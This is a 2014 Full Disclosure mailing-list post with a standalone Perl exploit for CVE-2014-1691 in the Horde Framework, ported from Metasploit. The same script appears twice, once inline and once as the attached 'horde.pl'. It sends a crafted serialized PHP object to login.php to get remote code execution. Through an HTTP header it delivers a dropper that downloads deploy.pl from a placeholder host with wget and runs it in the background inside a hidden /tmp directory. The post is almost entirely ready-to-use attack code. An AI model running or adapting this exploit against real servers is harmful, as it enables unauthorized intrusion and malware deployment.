'[FD] Horde Framework Unserialize PHP Code Execution - metasploit port / standalone exploit'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Horde Framework Unserialize PHP Code Execution - metasploit port / standalone exploit
From:       Akra Macha <akra1399 () gmail ! com>
Date:       2014-06-28 20:35:25
Message-ID: CAHjZCPkg+K4Q6LZO0iq8S03fpcQsUt7yjs_jaR4RjGdsEwGkMA () mail ! gmail ! com
[Download RAW message or body]

#ported from metasploit by irrlicht
#june 2014
#modify dropper url and run
#CVE-2014-1691
use strict;
use warnings;
use LWP::UserAgent;
use WWW::Mechanize;
use MIME::Base64;

if (!$ARGV[0]) {
 print "specify full login.php url\n";
 exit;
}
my $dropper = 'system("mkdir /tmp/\\" \\"; cd /tmp/\\" \\"; wget -O
deploy.pl http://0.0.0.0/deploy.pl; nohup perl deploy.pl > /dev/null 2>&1
&");';
my $command = encode_base64($dropper . "echo \"999999999\"; echo
\"EXPLOITED\"; system(\"ps aux; ls -la /tmp/\\\" \\\"\"); echo
\"999999999\";", "");
my $loginpath = $ARGV[0];
my $php_injection = "eval(base64_decode(\$_SERVER[HTTP_CMD]));die();";
my $payload_serialized =
"_formvars=O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";";
 $payload_serialized .=
"O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";";
 $payload_serialized .=
"a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:".
length($php_injection)
.":\"$php_injection\";}i:1;s:13:\"readXMLConfig\";}}";
$payload_serialized .=
"s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}";
 $payload_serialized .=
"s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}";
 $|=1;
my $ua = new LWP::UserAgent(ssl_opts => { verify_hostname => 0 });
$ua->timeout(3);
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13");
my $request;
$request = new HTTP::Request(POST => $loginpath);
$request->header('CMD' => $command);
$request->header('Content-Type' => "application/x-www-form-urlencoded");
$request->content($payload_serialized);
my $mech = WWW::Mechanize->new(timeout => 3, ssl_opts => { verify_hostname
=> 0 });
my $response = $mech->request($request);
my $code = $response->code;
my $body = $response->decoded_content;
print $response->code."\n";
#print $body."\n";
if ($body =~ /999999999/) {
 print $body."\n";
}

["horde.pl" (application/octet-stream)]

#ported from metasploit by irrlicht
#june 2014
#modify dropper url and run
use strict;
use warnings;
use LWP::UserAgent;
use WWW::Mechanize;
use MIME::Base64;

if (!$ARGV[0]) {
 print "specify full login.php url\n";
 exit;
}
my $dropper = 'system("mkdir /tmp/\\" \\"; cd /tmp/\\" \\"; wget -O deploy.pl \
http://0.0.0.0/deploy.pl; nohup perl deploy.pl > /dev/null 2>&1 &");'; my $command = \
encode_base64($dropper . "echo \"999999999\"; echo \"EXPLOITED\"; system(\"ps aux; ls -la \
/tmp/\\\" \\\"\"); echo \"999999999\";", ""); my $loginpath = $ARGV[0];
my $php_injection = "eval(base64_decode(\$_SERVER[HTTP_CMD]));die();";
my $payload_serialized = \
"_formvars=O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";";
 $payload_serialized .= \
"O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";";
 $payload_serialized .= "a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:". \
length($php_injection) .":\"$php_injection\";}i:1;s:13:\"readXMLConfig\";}}"; \
$payload_serialized .= \
"s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}";
 $payload_serialized .= \
"s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}";
 $|=1;
my $ua = new LWP::UserAgent(ssl_opts => { verify_hostname => 0 });
$ua->timeout(3);
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like \
Gecko) Chrome/9.0.597.98 Safari/534.13"); my $request;
$request = new HTTP::Request(POST => $loginpath);
$request->header('CMD' => $command);
$request->header('Content-Type' => "application/x-www-form-urlencoded");
$request->content($payload_serialized);
my $mech = WWW::Mechanize->new(timeout => 3, ssl_opts => { verify_hostname => 0 });
my $response = $mech->request($request);
my $code = $response->code;
my $body = $response->decoded_content;
print $response->code."\n";
#print $body."\n";
if ($body =~ /999999999/) {
 print $body."\n";
}

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[prev in list] [next in list] [prev in thread] [next in thread] 